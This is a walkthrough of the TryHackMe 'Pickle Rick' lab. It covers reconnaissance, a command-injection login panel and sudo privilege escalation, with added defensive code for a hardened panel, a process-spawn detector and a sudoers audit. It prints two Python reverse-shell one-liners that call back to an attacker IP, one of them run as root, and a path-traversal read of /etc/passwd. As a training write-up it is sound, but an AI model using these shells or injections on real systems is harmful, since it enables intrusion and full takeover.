Pickle Rick — TryHackMe Walkthrough
Hi! Today we are solving Pickle Rick on TryHackMe, an easy-rated room themed around the TV show Rick and Morty. To crack this room we’ll exploit a command injection vulnerability found on the web server, then abuse a sudo misconfiguration to reach root.
Room Link: https://tryhackme.com/room/picklerick
Let’s get started!
Let us first add our target IP to /etc/hosts:
Step 0: Reconnaissance
We must discover the open ports on the target machine. For this task I’ll use Nmap (Network Mapper), a popular tool used by pentesters for target enumeration.
sudo nmap -sC -sV -oN logs/initial_nmap rick.thm
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief
- 22/tcp — SSH (Secure Shell) — used for secure remote access to systems; we would need a valid username and password to log in to the target over SSH.
- 80/tcp — HTTP server — running an Apache 2.4.18 web server.
Step 1: Exploring web server
Let us visit the website running on port 80 (HTTP) and check for useful information.
On the surface, it looks like a normal web page. Let’s inspect the source code for any clues.
There’s a comment that gives us a username (R1ckRul3s), which could be used to log in to the SSH server or somewhere else. Now let’s check the robots.txt file to see if it reveals any directories.
Weird! It’s some random gibberish; it’s not even a directory.
We haven’t got anything juicy as of now. Let us now enumerate the web server to find the existing directories and files on it. We’ll use gobuster for this task — gobuster is a tool for brute-forcing directories and files on web servers.
gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
No luck! Let’s run it again with a different wordlist, and this time also check for .php and .html extensions.
gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html
We discover what looks like a login page and a portal that requires authentication through that login page.
Let’s use the username from the source code and the gibberish from the robots.txt file to log in.
And we find a command panel. Looks like we can use command injection to compromise this machine.
Tried a path traversal with cat ../../../etc/passwd, but the cat command is disabled:
Let’s try the less command instead.
And the command injection works!
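The reason `less` works where `cat` is blocked is that the panel filters by command name and then hands the rest of the line to a shell. The following is an added example (not the room’s own source code): a toy panel handler showing that denylist next to an allowlist design that maps named actions to fixed argument lists and resolves any file name inside a fixed directory. The denylist contents, the action names and the `BASE_DIR` path are assumptions for illustration.

```python
"""
Added example, not the TryHackMe room's own source: the command panel's
apparent denylist (blocks `cat`, lets `less` through) next to an allowlist
design. The filter, action names and BASE_DIR are assumptions.
"""
import os
import shlex
import subprocess

# --- how the panel appears to behave: a denylist in front of a shell ---
DENIED_COMMANDS = {"cat"}          # assumed: the room's panel clearly blocks cat


def denylist_permits(user_cmd: str) -> bool:
    """True if the denylist would pass this command line on to the shell."""
    try:
        argv = shlex.split(user_cmd)
    except ValueError:             # unbalanced quotes
        return False
    # Only the first word is checked, so any other program that reads
    # files (less, head, tail, ...) sails straight through.
    return bool(argv) and argv[0] not in DENIED_COMMANDS


def vulnerable_run(user_cmd: str) -> str:
    """The anti-pattern: user-controlled text reaches /bin/sh via shell=True."""
    if not denylist_permits(user_cmd):
        return "Command disabled"
    return subprocess.run(user_cmd, shell=True, capture_output=True, text=True).stdout


# --- the hardened shape: named actions mapped to fixed argv, no shell ---
ACTIONS = {                        # assumed action names
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
}
BASE_DIR = "/var/www/panel/files"  # assumed directory the panel may read from


def build_argv(action: str):
    """Fixed argv for a known action, None for anything else."""
    return ACTIONS.get(action)


def safe_path(name: str):
    """Resolve a user-supplied file name inside BASE_DIR; reject traversal."""
    candidate = os.path.normpath(os.path.join(BASE_DIR, name))
    # normpath collapses '..'; an absolute name makes join() discard BASE_DIR,
    # so the prefix check catches both cases.
    return candidate if candidate.startswith(BASE_DIR + os.sep) else None


def hardened_run(action: str, filename: str = "") -> str:
    """Run an allowlisted action; 'show' reads a file only from BASE_DIR."""
    if action == "show":
        path = safe_path(filename)
        if path is None:
            return "Invalid file"
        argv = ["head", "-n", "20", path]
    else:
        argv = build_argv(action)
        if argv is None:
            return "Unknown action"
    # argv list, no shell: user input can only ever be an argument value.
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for line in ("cat ../../../etc/passwd", "less ../../../etc/passwd"):
        print(f"{line!r}: denylist permits = {denylist_permits(line)}")
    print(hardened_run("less /etc/passwd"))
    print(hardened_run("show", "../../../etc/passwd"))
```

The point the allowlist makes is that the right question is never "which commands should I block?" but "which few operations does this page actually need?"; everything else, including the shell itself, is simply not reachable from user input.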
Step 2: Compromising the system
Let’s start a netcat listener on our attack machine and get a shell through the command injection. Here’s how to do it:
On attack machine:
nc -nlvp 9001
On command panel:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bingo! We’re in…
But before moving forward, let us stabilize the shell:
Now we have a fully interactive shell.
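From the defender’s side, what just happened is a web server process launching an interpreter that opens an outbound connection. As an added example (not part of the room or this walkthrough), here is a small detection rule run over constructed process-creation events in a key=value form; a real deployment would read auditd EXECVE records or an EDR process stream instead, and the field names used here are assumptions.

```python
"""
Added example, not part of the room or the walkthrough: a process-creation
detection that flags the web server account spawning a shell or interpreter,
and the same account later invoking sudo. Events below are constructed.
"""
import shlex

# Constructed events. Event 2 is the command panel launching an interpreter
# (payload elided); event 3 is the later sudo step; 4 and 5 are benign.
SAMPLE_EVENTS = """\
ts=1 user=www-data ppid_comm=apache2 comm=sh cmdline="sh -c uptime"
ts=2 user=www-data ppid_comm=apache2 comm=python3 cmdline="python3 -c ..."
ts=3 user=www-data ppid_comm=bash comm=sudo cmdline="sudo python3 -c ..."
ts=4 user=ubuntu ppid_comm=sshd comm=bash cmdline="bash"
ts=5 user=www-data ppid_comm=apache2 comm=php cmdline="php /var/www/html/index.php"
"""

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}
WEB_ACCOUNTS = {"www-data", "apache", "nginx"}
# Programs a web server has no business spawning directly in most deployments.
SHELLS_AND_INTERPRETERS = {"sh", "bash", "dash", "python", "python3",
                           "perl", "nc", "ncat", "socat"}


def parse_event(line: str) -> dict:
    """Parse one key=value line; shlex keeps quoted values intact."""
    return dict(tok.split("=", 1) for tok in shlex.split(line))


def detect(events_text: str):
    """Return (ts, rule, detail) for each event that matches a rule."""
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        user, parent, comm = ev.get("user"), ev.get("ppid_comm"), ev.get("comm")
        if parent in WEB_PARENTS and comm in SHELLS_AND_INTERPRETERS:
            alerts.append((ev["ts"], "web_server_spawned_shell",
                           f"{parent} -> {comm} as {user}"))
        elif user in WEB_ACCOUNTS and comm == "sudo":
            # A service account should never need sudo; if it can, the
            # sudoers file is the real problem (see the next step).
            alerts.append((ev["ts"], "web_account_sudo", ev.get("cmdline", "")))
    return alerts


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{ts}] {rule}: {detail}")
```

Event 1 is also flagged, which is deliberate: a panel that runs `sh -c` for every request produces exactly the parent/child pair a reverse shell does, so the rule would have been noisy on this host from the moment the feature was deployed. That noise is itself a useful signal that the application design needs fixing.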
Let’s grab the first ingredient (flag):
Let’s check what clue we have:
Gotta navigate around the file system now!
In the home directory we find two users: Ubuntu and Rick.
Inside Rick’s home directory, we get the second ingredient.
Step 3: Privilege Escalation
Let’s check which commands our current user can execute as the root user using the sudo -l command:
We can execute all commands with sudo without needing a password. That’s a crazy blunder! Such misconfigurations make the system trivially exploitable.
Let’s abuse this by spawning another reverse shell to our machine, but this time the connection back to our listener will run with root privileges:
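The entry behind that `sudo -l` output is a single sudoers line granting the web service account every command without a password. As an added example (not part of the room or this walkthrough), here is a small audit that parses sudoers-style lines and grades them, so the same mistake can be caught on a fleet before anyone finds it from a command panel. The sudoers text is constructed; the www-data line mirrors the room’s misconfiguration and the others are ordinary entries for comparison.

```python
"""
Added example, not part of the TryHackMe room or this walkthrough: a sudoers
audit that flags the kind of entry `sudo -l` revealed on the target (every
command as root, no password). The sudoers text below is constructed.
"""
import re

SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(ALL) NOPASSWD: ALL
deploy          ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# user_or_group  hosts = (runas) [TAG: ...] commands
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
        "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}
# Accounts that run network-facing services; they should not be in sudoers at all.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres"}


def parse_spec(cmds: str):
    """Split 'NOPASSWD: /bin/foo' into (set of tags, command string)."""
    tags = set()
    rest = cmds.strip()
    while True:
        head, sep, tail = rest.partition(":")
        if sep and head.strip().upper() in TAGS:
            tags.add(head.strip().upper())
            rest = tail.strip()
        else:
            return tags, rest


def audit_sudoers(text: str):
    """Return one finding per risky user specification, in file order."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        # Defaults lines may contain '=' but are not user specs.
        if not line or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        user = m.group("user")
        tags, commands = parse_spec(m.group("cmds"))
        reasons = []
        if "NOPASSWD" in tags and commands == "ALL":
            severity = "critical"
            reasons.append("passwordless sudo for every command")
        elif user in SERVICE_ACCOUNTS:
            severity = "high"
            reasons.append("service account present in sudoers")
        elif "NOPASSWD" in tags:
            severity = "low"
            reasons.append("passwordless sudo for specific commands; review the binary")
        else:
            continue
        if severity == "critical" and user in SERVICE_ACCOUNTS:
            reasons.append("service account present in sudoers")
        findings.append({"user": user, "runas": m.group("runas") or user,
                         "commands": commands, "tags": sorted(tags),
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['severity']:8} {f['user']:10} {f['commands']}  ({'; '.join(f['reasons'])})")
```

The fix for the critical finding is to delete the line: a web server account needs no sudo at all, and if one specific privileged operation is genuinely required, it should be a single fixed command path rather than `ALL`. The "low" findings are still worth a look, because a NOPASSWD entry for a binary that can spawn a shell or write arbitrary files is effectively the same as `ALL`.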
On attack machine:
nc -nlvp 4444
On target machine:
sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
On the netcat listener we get our privileged shell after executing the reverse shell code:
pwned!!!
We got all three ingredients. Let’s hope that Rick now turns back into a human.
Conclusion
Pickle Rick is a fun themed room that requires knowledge of web exploitation and privilege escalation. Despite this being an easy-rated room, some may find it a bit difficult; I personally struggled with the web enumeration part, where I was supposed to discover the command panel that was vulnerable to a command injection attack.
Happy Hacking!